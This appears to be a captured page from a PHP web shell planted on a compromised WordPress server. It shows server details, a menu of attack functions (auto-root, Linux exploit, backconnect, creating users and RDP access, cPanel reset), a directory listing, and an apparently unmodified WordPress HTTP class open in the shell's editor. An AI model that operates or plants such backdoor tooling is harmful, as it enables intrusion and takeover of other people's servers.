Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.220.43.27
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ilpnowa /
web /
wp-includes /
[ HOME SHELL ]
Name
Size
Permission
Action
ID3
[ DIR ]
drwxr-xr-x
IXR
[ DIR ]
drwxr-xr-x
Requests
[ DIR ]
drwxr-xr-x
SimplePie
[ DIR ]
drwxr-xr-x
Text
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
customize
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
pomo
[ DIR ]
drwxr-xr-x
random_compat
[ DIR ]
drwxr-xr-x
rest-api
[ DIR ]
drwxr-xr-x
theme-compat
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
admin-bar.php
27.98
KB
-rw-r--r--
atomlib.php
11.56
KB
-rw-r--r--
author-template.php
15.75
KB
-rw-r--r--
bookmark-template.php
11.42
KB
-rw-r--r--
bookmark.php
13.35
KB
-rw-r--r--
cache.php
21.09
KB
-rw-r--r--
canonical.php
26.94
KB
-rw-r--r--
capabilities.php
27.55
KB
-rw-r--r--
category-template.php
50.12
KB
-rw-r--r--
category.php
11.7
KB
-rw-r--r--
class-IXR.php
2.51
KB
-rw-r--r--
class-feed.php
522
B
-rw-r--r--
class-http.php
35.32
KB
-rw-r--r--
class-json.php
39.52
KB
-rw-r--r--
class-oembed.php
32.34
KB
-rw-r--r--
class-phpass.php
7.15
KB
-rw-r--r--
class-phpmailer.php
143.34
KB
-rw-r--r--
class-pop3.php
20.43
KB
-rw-r--r--
class-requests.php
29.09
KB
-rw-r--r--
class-simplepie.php
87.17
KB
-rw-r--r--
class-smtp.php
38.55
KB
-rw-r--r--
class-snoopy.php
36.9
KB
-rw-r--r--
class-walker-category-dropdown...
2.05
KB
-rw-r--r--
class-walker-category.php
6.49
KB
-rw-r--r--
class-walker-comment.php
10.91
KB
-rw-r--r--
class-walker-nav-menu.php
8.2
KB
-rw-r--r--
class-walker-page-dropdown.php
2.23
KB
-rw-r--r--
class-walker-page.php
6.56
KB
-rw-r--r--
class-wp-admin-bar.php
16.57
KB
-rw-r--r--
class-wp-ajax-response.php
4.91
KB
-rw-r--r--
class-wp-comment-query.php
40.76
KB
-rw-r--r--
class-wp-comment.php
8.73
KB
-rw-r--r--
class-wp-customize-control.php
24.4
KB
-rw-r--r--
class-wp-customize-manager.php
192.6
KB
-rw-r--r--
class-wp-customize-nav-menus.p...
52.31
KB
-rw-r--r--
class-wp-customize-panel.php
9.35
KB
-rw-r--r--
class-wp-customize-section.php
9.96
KB
-rw-r--r--
class-wp-customize-setting.php
27.47
KB
-rw-r--r--
class-wp-customize-widgets.php
64.2
KB
-rw-r--r--
class-wp-dependency.php
1.51
KB
-rw-r--r--
class-wp-editor.php
59.28
KB
-rw-r--r--
class-wp-embed.php
14.17
KB
-rw-r--r--
class-wp-error.php
4.48
KB
-rw-r--r--
class-wp-feed-cache-transient....
2.48
KB
-rw-r--r--
class-wp-feed-cache.php
745
B
-rw-r--r--
class-wp-hook.php
13.72
KB
-rw-r--r--
class-wp-http-cookie.php
6.3
KB
-rw-r--r--
class-wp-http-curl.php
11.41
KB
-rw-r--r--
class-wp-http-encoding.php
6.29
KB
-rw-r--r--
class-wp-http-ixr-client.php
3.17
KB
-rw-r--r--
class-wp-http-proxy.php
5.82
KB
-rw-r--r--
class-wp-http-requests-hooks.p...
1.83
KB
-rw-r--r--
class-wp-http-requests-respons...
4.17
KB
-rw-r--r--
class-wp-http-response.php
2.8
KB
-rw-r--r--
class-wp-http-streams.php
14.64
KB
-rw-r--r--
class-wp-image-editor-gd.php
12.62
KB
-rw-r--r--
class-wp-image-editor-imagick....
21.17
KB
-rw-r--r--
class-wp-image-editor.php
11.43
KB
-rw-r--r--
class-wp-list-util.php
6.22
KB
-rw-r--r--
class-wp-locale-switcher.php
4.94
KB
-rw-r--r--
class-wp-locale.php
14.21
KB
-rw-r--r--
class-wp-matchesmapregex.php
1.75
KB
-rw-r--r--
class-wp-meta-query.php
21.73
KB
-rw-r--r--
class-wp-metadata-lazyloader.p...
5.25
KB
-rw-r--r--
class-wp-network-query.php
16.72
KB
-rw-r--r--
class-wp-network.php
11.84
KB
-rw-r--r--
class-wp-oembed-controller.php
5.46
KB
-rw-r--r--
class-wp-post-type.php
17.81
KB
-rw-r--r--
class-wp-post.php
6.21
KB
-rw-r--r--
class-wp-query.php
121.06
KB
-rw-r--r--
class-wp-rewrite.php
57.53
KB
-rw-r--r--
class-wp-role.php
2.55
KB
-rw-r--r--
class-wp-roles.php
8
KB
-rw-r--r--
class-wp-session-tokens.php
7.17
KB
-rw-r--r--
class-wp-simplepie-file.php
2.22
KB
-rw-r--r--
class-wp-simplepie-sanitize-ks...
1.73
KB
-rw-r--r--
class-wp-site-query.php
22.64
KB
-rw-r--r--
class-wp-site.php
7.15
KB
-rw-r--r--
class-wp-tax-query.php
18.75
KB
-rw-r--r--
class-wp-taxonomy.php
9.76
KB
-rw-r--r--
class-wp-term-query.php
33.36
KB
-rw-r--r--
class-wp-term.php
5.15
KB
-rw-r--r--
class-wp-text-diff-renderer-in...
712
B
-rw-r--r--
class-wp-text-diff-renderer-ta...
14.84
KB
-rw-r--r--
class-wp-theme.php
46.76
KB
-rw-r--r--
class-wp-user-meta-session-tok...
2.85
KB
-rw-r--r--
class-wp-user-query.php
28.83
KB
-rw-r--r--
class-wp-user.php
20.19
KB
-rw-r--r--
class-wp-walker.php
12.09
KB
-rw-r--r--
class-wp-widget-factory.php
3.66
KB
-rw-r--r--
class-wp-widget.php
17.24
KB
-rw-r--r--
class-wp-xmlrpc-server.php
196.66
KB
-rw-r--r--
class-wp.php
23.2
KB
-rw-r--r--
class-wpglobus-plus-acf.php
1.57
KB
-rw-r--r--
class-wpglobus-plus-menu.php
2.48
KB
-rw-r--r--
class-wpglobus-plus-publish.ph...
15.03
KB
-rw-r--r--
class-wpglobus-plus-slug-acf.p...
1.14
KB
-rw-r--r--
class-wpglobus-plus-slug.php
22.27
KB
-rw-r--r--
class-wpglobus-plus-tablepress...
2.97
KB
-rw-r--r--
class-wpglobus-plus-wpglobedit...
7.36
KB
-rw-r--r--
class-wpglobus-plus-wpseo23.ph...
17.62
KB
-rw-r--r--
class-wpglobus-plus-yoastseo30...
1.25
KB
-rw-r--r--
class.wp-dependencies.php
10.92
KB
-rw-r--r--
class.wp-scripts.php
13.83
KB
-rw-r--r--
class.wp-styles.php
9.56
KB
-rw-r--r--
comment-template.php
86.15
KB
-rw-r--r--
comment.php
108.76
KB
-rw-r--r--
compat.php
15.85
KB
-rw-r--r--
cron.php
16.08
KB
-rw-r--r--
date.php
34.18
KB
-rw-r--r--
default-constants.php
9.34
KB
-rw-r--r--
default-filters.php
26.61
KB
-rw-r--r--
default-widgets.php
2.13
KB
-rw-r--r--
deprecated.php
110.57
KB
-rw-r--r--
embed-template.php
344
B
-rw-r--r--
embed.php
43.31
KB
-rw-r--r--
feed-atom-comments.php
5.23
KB
-rw-r--r--
feed-atom.php
3.02
KB
-rw-r--r--
feed-rdf.php
2.61
KB
-rw-r--r--
feed-rss.php
1.22
KB
-rw-r--r--
feed-rss2-comments.php
3.97
KB
-rw-r--r--
feed-rss2.php
3.68
KB
-rw-r--r--
feed.php
19.09
KB
-rw-r--r--
formatting.php
264.84
KB
-rw-r--r--
functions.php
183.38
KB
-rw-r--r--
functions.wp-scripts.php
11.21
KB
-rw-r--r--
functions.wp-styles.php
7.89
KB
-rw-r--r--
general-template.php
135.77
KB
-rw-r--r--
http.php
21.65
KB
-rw-r--r--
kses.php
48.93
KB
-rw-r--r--
l10n.php
42.46
KB
-rw-r--r--
link-template.php
133.25
KB
-rw-r--r--
load.php
33.11
KB
-rw-r--r--
locale.php
141
B
-rw-r--r--
media-template.php
45.03
KB
-rw-r--r--
media.php
137.07
KB
-rw-r--r--
meta.php
41.76
KB
-rw-r--r--
ms-blogs.php
38.26
KB
-rw-r--r--
ms-default-constants.php
4.6
KB
-rw-r--r--
ms-default-filters.php
4.54
KB
-rw-r--r--
ms-deprecated.php
15.32
KB
-rw-r--r--
ms-files.php
2.56
KB
-rw-r--r--
ms-functions.php
89
KB
-rw-r--r--
ms-load.php
18.8
KB
-rw-r--r--
ms-settings.php
3.99
KB
-rw-r--r--
nav-menu-template.php
20.38
KB
-rw-r--r--
nav-menu.php
38.6
KB
-rw-r--r--
option.php
66.16
KB
-rw-r--r--
pluggable-deprecated.php
6.12
KB
-rw-r--r--
pluggable.php
89.97
KB
-rw-r--r--
plugin.php
30.93
KB
-rw-r--r--
post-formats.php
6.81
KB
-rw-r--r--
post-template.php
57.35
KB
-rw-r--r--
post-thumbnail-template.php
8.02
KB
-rw-r--r--
post.php
214.7
KB
-rw-r--r--
query.php
25.02
KB
-rw-r--r--
registration-functions.php
178
B
-rw-r--r--
registration.php
178
B
-rw-r--r--
rest-api.php
37.63
KB
-rw-r--r--
revision.php
20.81
KB
-rw-r--r--
rewrite.php
17.09
KB
-rw-r--r--
rss-functions.php
191
B
-rw-r--r--
rss.php
22.66
KB
-rw-r--r--
script-loader.php
78.28
KB
-rw-r--r--
session.php
242
B
-rw-r--r--
shortcodes.php
19.96
KB
-rw-r--r--
spl-autoload-compat.php
2.51
KB
-rw-r--r--
taxonomy.php
147.09
KB
-rw-r--r--
template-loader.php
2.83
KB
-rw-r--r--
template.php
19.33
KB
-rw-r--r--
theme.php
97.44
KB
-rw-r--r--
update.php
24.11
KB
-rw-r--r--
user.php
118.2
KB
-rw-r--r--
vars.php
5.45
KB
-rw-r--r--
version.php
649
B
-rw-r--r--
widgets.php
54.14
KB
-rw-r--r--
wlwmanifest.xml
1.02
KB
-rw-r--r--
wp-db.php
97.14
KB
-rw-r--r--
wp-diff.php
661
B
-rw-r--r--
wpglobus-plus-acf.php
296
B
-rw-r--r--
wpglobus-plus-main.php
10.57
KB
-rw-r--r--
wpglobus-plus-menu.php
205
B
-rw-r--r--
wpglobus-plus-publish.php
217
B
-rw-r--r--
wpglobus-plus-slug.php
360
B
-rw-r--r--
wpglobus-plus-tablepress-funct...
1.14
KB
-rw-r--r--
wpglobus-plus-tablepress.php
226
B
-rw-r--r--
wpglobus-plus-wpglobeditor.php
2.29
KB
-rw-r--r--
wpglobus-plus-wpseo.php
884
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-wp-http-streams.php
<?php /** * HTTP API: WP_Http_Streams class * * @package WordPress * @subpackage HTTP * @since 4.4.0 */ /** * Core class used to integrate PHP Streams as an HTTP transport. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to `stream_socket_client()`. */ class WP_Http_Streams { /** * Send a HTTP request to a URI using PHP Streams. * * @see WP_Http::request For default options descriptions. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client(). * * @param string $url The request URL. * @param string|array $args Optional. Override the defaults. * @return array|WP_Error Array containing 'headers', 'body', 'response', 'cookies', 'filename'. A WP_Error instance upon error */ public function request($url, $args = array()) { $defaults = array( 'method' => 'GET', 'timeout' => 5, 'redirection' => 5, 'httpversion' => '1.0', 'blocking' => true, 'headers' => array(), 'body' => null, 'cookies' => array() ); $r = wp_parse_args( $args, $defaults ); if ( isset( $r['headers']['User-Agent'] ) ) { $r['user-agent'] = $r['headers']['User-Agent']; unset( $r['headers']['User-Agent'] ); } elseif ( isset( $r['headers']['user-agent'] ) ) { $r['user-agent'] = $r['headers']['user-agent']; unset( $r['headers']['user-agent'] ); } // Construct Cookie: header if any cookies are set. WP_Http::buildCookieHeader( $r ); $arrURL = parse_url($url); $connect_host = $arrURL['host']; $secure_transport = ( $arrURL['scheme'] == 'ssl' || $arrURL['scheme'] == 'https' ); if ( ! isset( $arrURL['port'] ) ) { if ( $arrURL['scheme'] == 'ssl' || $arrURL['scheme'] == 'https' ) { $arrURL['port'] = 443; $secure_transport = true; } else { $arrURL['port'] = 80; } } // Always pass a Path, defaulting to the root in cases such as http://example.com if ( ! isset( $arrURL['path'] ) ) { $arrURL['path'] = '/'; } if ( isset( $r['headers']['Host'] ) || isset( $r['headers']['host'] ) ) { if ( isset( $r['headers']['Host'] ) ) $arrURL['host'] = $r['headers']['Host']; else $arrURL['host'] = $r['headers']['host']; unset( $r['headers']['Host'], $r['headers']['host'] ); } /* * Certain versions of PHP have issues with 'localhost' and IPv6, It attempts to connect * to ::1, which fails when the server is not set up for it. For compatibility, always * connect to the IPv4 address. */ if ( 'localhost' == strtolower( $connect_host ) ) $connect_host = '127.0.0.1'; $connect_host = $secure_transport ? 'ssl://' . $connect_host : 'tcp://' . $connect_host; $is_local = isset( $r['local'] ) && $r['local']; $ssl_verify = isset( $r['sslverify'] ) && $r['sslverify']; if ( $is_local ) { /** * Filters whether SSL should be verified for local requests. * * @since 2.8.0 * * @param bool $ssl_verify Whether to verify the SSL connection. Default true. */ $ssl_verify = apply_filters( 'https_local_ssl_verify', $ssl_verify ); } elseif ( ! $is_local ) { /** * Filters whether SSL should be verified for non-local requests. * * @since 2.8.0 * * @param bool $ssl_verify Whether to verify the SSL connection. Default true. */ $ssl_verify = apply_filters( 'https_ssl_verify', $ssl_verify ); } $proxy = new WP_HTTP_Proxy(); $context = stream_context_create( array( 'ssl' => array( 'verify_peer' => $ssl_verify, //'CN_match' => $arrURL['host'], // This is handled by self::verify_ssl_certificate() 'capture_peer_cert' => $ssl_verify, 'SNI_enabled' => true, 'cafile' => $r['sslcertificates'], 'allow_self_signed' => ! $ssl_verify, ) ) ); $timeout = (int) floor( $r['timeout'] ); $utimeout = $timeout == $r['timeout'] ? 0 : 1000000 * $r['timeout'] % 1000000; $connect_timeout = max( $timeout, 1 ); // Store error number. $connection_error = null; // Store error string. $connection_error_str = null; if ( !WP_DEBUG ) { // In the event that the SSL connection fails, silence the many PHP Warnings. if ( $secure_transport ) $error_reporting = error_reporting(0); if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) $handle = @stream_socket_client( 'tcp://' . $proxy->host() . ':' . $proxy->port(), $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); else $handle = @stream_socket_client( $connect_host . ':' . $arrURL['port'], $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); if ( $secure_transport ) error_reporting( $error_reporting ); } else { if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) $handle = stream_socket_client( 'tcp://' . $proxy->host() . ':' . $proxy->port(), $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); else $handle = stream_socket_client( $connect_host . ':' . $arrURL['port'], $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } if ( false === $handle ) { // SSL connection failed due to expired/invalid cert, or, OpenSSL configuration is broken. if ( $secure_transport && 0 === $connection_error && '' === $connection_error_str ) return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) ); return new WP_Error('http_request_failed', $connection_error . ': ' . $connection_error_str ); } // Verify that the SSL certificate is valid for this request. if ( $secure_transport && $ssl_verify && ! $proxy->is_enabled() ) { if ( ! self::verify_ssl_certificate( $handle, $arrURL['host'] ) ) return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) ); } stream_set_timeout( $handle, $timeout, $utimeout ); if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) //Some proxies require full URL in this field. $requestPath = $url; else $requestPath = $arrURL['path'] . ( isset($arrURL['query']) ? '?' . $arrURL['query'] : '' ); $strHeaders = strtoupper($r['method']) . ' ' . $requestPath . ' HTTP/' . $r['httpversion'] . "\r\n"; $include_port_in_host_header = ( ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) || ( 'http' == $arrURL['scheme'] && 80 != $arrURL['port'] ) || ( 'https' == $arrURL['scheme'] && 443 != $arrURL['port'] ) ); if ( $include_port_in_host_header ) { $strHeaders .= 'Host: ' . $arrURL['host'] . ':' . $arrURL['port'] . "\r\n"; } else { $strHeaders .= 'Host: ' . $arrURL['host'] . "\r\n"; } if ( isset($r['user-agent']) ) $strHeaders .= 'User-agent: ' . $r['user-agent'] . "\r\n"; if ( is_array($r['headers']) ) { foreach ( (array) $r['headers'] as $header => $headerValue ) $strHeaders .= $header . ': ' . $headerValue . "\r\n"; } else { $strHeaders .= $r['headers']; } if ( $proxy->use_authentication() ) $strHeaders .= $proxy->authentication_header() . "\r\n"; $strHeaders .= "\r\n"; if ( ! is_null($r['body']) ) $strHeaders .= $r['body']; fwrite($handle, $strHeaders); if ( ! $r['blocking'] ) { stream_set_blocking( $handle, 0 ); fclose( $handle ); return array( 'headers' => array(), 'body' => '', 'response' => array('code' => false, 'message' => false), 'cookies' => array() ); } $strResponse = ''; $bodyStarted = false; $keep_reading = true; $block_size = 4096; if ( isset( $r['limit_response_size'] ) ) $block_size = min( $block_size, $r['limit_response_size'] ); // If streaming to a file setup the file handle. if ( $r['stream'] ) { if ( ! WP_DEBUG ) $stream_handle = @fopen( $r['filename'], 'w+' ); else $stream_handle = fopen( $r['filename'], 'w+' ); if ( ! $stream_handle ) { return new WP_Error( 'http_request_failed', sprintf( /* translators: 1: fopen() 2: file name */ __( 'Could not open handle for %1$s to %2$s.' ), 'fopen()', $r['filename'] ) ); } $bytes_written = 0; while ( ! feof($handle) && $keep_reading ) { $block = fread( $handle, $block_size ); if ( ! $bodyStarted ) { $strResponse .= $block; if ( strpos( $strResponse, "\r\n\r\n" ) ) { $process = WP_Http::processResponse( $strResponse ); $bodyStarted = true; $block = $process['body']; unset( $strResponse ); $process['body'] = ''; } } $this_block_size = strlen( $block ); if ( isset( $r['limit_response_size'] ) && ( $bytes_written + $this_block_size ) > $r['limit_response_size'] ) { $this_block_size = ( $r['limit_response_size'] - $bytes_written ); $block = substr( $block, 0, $this_block_size ); } $bytes_written_to_file = fwrite( $stream_handle, $block ); if ( $bytes_written_to_file != $this_block_size ) { fclose( $handle ); fclose( $stream_handle ); return new WP_Error( 'http_request_failed', __( 'Failed to write request to temporary file.' ) ); } $bytes_written += $bytes_written_to_file; $keep_reading = !isset( $r['limit_response_size'] ) || $bytes_written < $r['limit_response_size']; } fclose( $stream_handle ); } else { $header_length = 0; while ( ! feof( $handle ) && $keep_reading ) { $block = fread( $handle, $block_size ); $strResponse .= $block; if ( ! $bodyStarted && strpos( $strResponse, "\r\n\r\n" ) ) { $header_length = strpos( $strResponse, "\r\n\r\n" ) + 4; $bodyStarted = true; } $keep_reading = ( ! $bodyStarted || !isset( $r['limit_response_size'] ) || strlen( $strResponse ) < ( $header_length + $r['limit_response_size'] ) ); } $process = WP_Http::processResponse( $strResponse ); unset( $strResponse ); } fclose( $handle ); $arrHeaders = WP_Http::processHeaders( $process['headers'], $url ); $response = array( 'headers' => $arrHeaders['headers'], // Not yet processed. 'body' => null, 'response' => $arrHeaders['response'], 'cookies' => $arrHeaders['cookies'], 'filename' => $r['filename'] ); // Handle redirects. if ( false !== ( $redirect_response = WP_Http::handle_redirects( $url, $r, $response ) ) ) return $redirect_response; // If the body was chunk encoded, then decode it. if ( ! empty( $process['body'] ) && isset( $arrHeaders['headers']['transfer-encoding'] ) && 'chunked' == $arrHeaders['headers']['transfer-encoding'] ) $process['body'] = WP_Http::chunkTransferDecode($process['body']); if ( true === $r['decompress'] && true === WP_Http_Encoding::should_decode($arrHeaders['headers']) ) $process['body'] = WP_Http_Encoding::decompress( $process['body'] ); if ( isset( $r['limit_response_size'] ) && strlen( $process['body'] ) > $r['limit_response_size'] ) $process['body'] = substr( $process['body'], 0, $r['limit_response_size'] ); $response['body'] = $process['body']; return $response; } /** * Verifies the received SSL certificate against its Common Names and subjectAltName fields. * * PHP's SSL verifications only verify that it's a valid Certificate, it doesn't verify if * the certificate is valid for the hostname which was requested. * This function verifies the requested hostname against certificate's subjectAltName field, * if that is empty, or contains no DNS entries, a fallback to the Common Name field is used. * * IP Address support is included if the request is being made to an IP address. * * @since 3.7.0 * @static * * @param stream $stream The PHP Stream which the SSL request is being made over * @param string $host The hostname being requested * @return bool If the cerficiate presented in $stream is valid for $host */ public static function verify_ssl_certificate( $stream, $host ) { $context_options = stream_context_get_options( $stream ); if ( empty( $context_options['ssl']['peer_certificate'] ) ) return false; $cert = openssl_x509_parse( $context_options['ssl']['peer_certificate'] ); if ( ! $cert ) return false; /* * If the request is being made to an IP address, we'll validate against IP fields * in the cert (if they exist) */ $host_type = ( WP_Http::is_ip_address( $host ) ? 'ip' : 'dns' ); $certificate_hostnames = array(); if ( ! empty( $cert['extensions']['subjectAltName'] ) ) { $match_against = preg_split( '/,\s*/', $cert['extensions']['subjectAltName'] ); foreach ( $match_against as $match ) { list( $match_type, $match_host ) = explode( ':', $match ); if ( $host_type == strtolower( trim( $match_type ) ) ) // IP: or DNS: $certificate_hostnames[] = strtolower( trim( $match_host ) ); } } elseif ( !empty( $cert['subject']['CN'] ) ) { // Only use the CN when the certificate includes no subjectAltName extension. $certificate_hostnames[] = strtolower( $cert['subject']['CN'] ); } // Exact hostname/IP matches. if ( in_array( strtolower( $host ), $certificate_hostnames ) ) return true; // IP's can't be wildcards, Stop processing. if ( 'ip' == $host_type ) return false; // Test to see if the domain is at least 2 deep for wildcard support. if ( substr_count( $host, '.' ) < 2 ) return false; // Wildcard subdomains certs (*.example.com) are valid for a.example.com but not a.b.example.com. $wildcard_host = preg_replace( '/^[^.]+\./', '*.', $host ); return in_array( strtolower( $wildcard_host ), $certificate_hostnames ); } /** * Determines whether this class can be used for retrieving a URL. * * @static * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client(). * * @param array $args Optional. Array of request arguments. Default empty array. * @return bool False means this class can not be used, true means it can. */ public static function test( $args = array() ) { if ( ! function_exists( 'stream_socket_client' ) ) return false; $is_ssl = isset( $args['ssl'] ) && $args['ssl']; if ( $is_ssl ) { if ( ! extension_loaded( 'openssl' ) ) return false; if ( ! function_exists( 'openssl_x509_parse' ) ) return false; } /** * Filters whether streams can be used as a transport for retrieving a URL. * * @since 2.7.0 * * @param bool $use_class Whether the class can be used. Default true. * @param array $args Request arguments. */ return apply_filters( 'use_streams_transport', true, $args ); } } /** * Deprecated HTTP Transport method which used fsockopen. * * This class is not used, and is included for backward compatibility only. * All code should make use of WP_Http directly through its API. * * @see WP_HTTP::request * * @since 2.7.0 * @deprecated 3.7.0 Please use WP_HTTP::request() directly */ class WP_HTTP_Fsockopen extends WP_HTTP_Streams { // For backward compatibility for users who are using the class directly. }
Close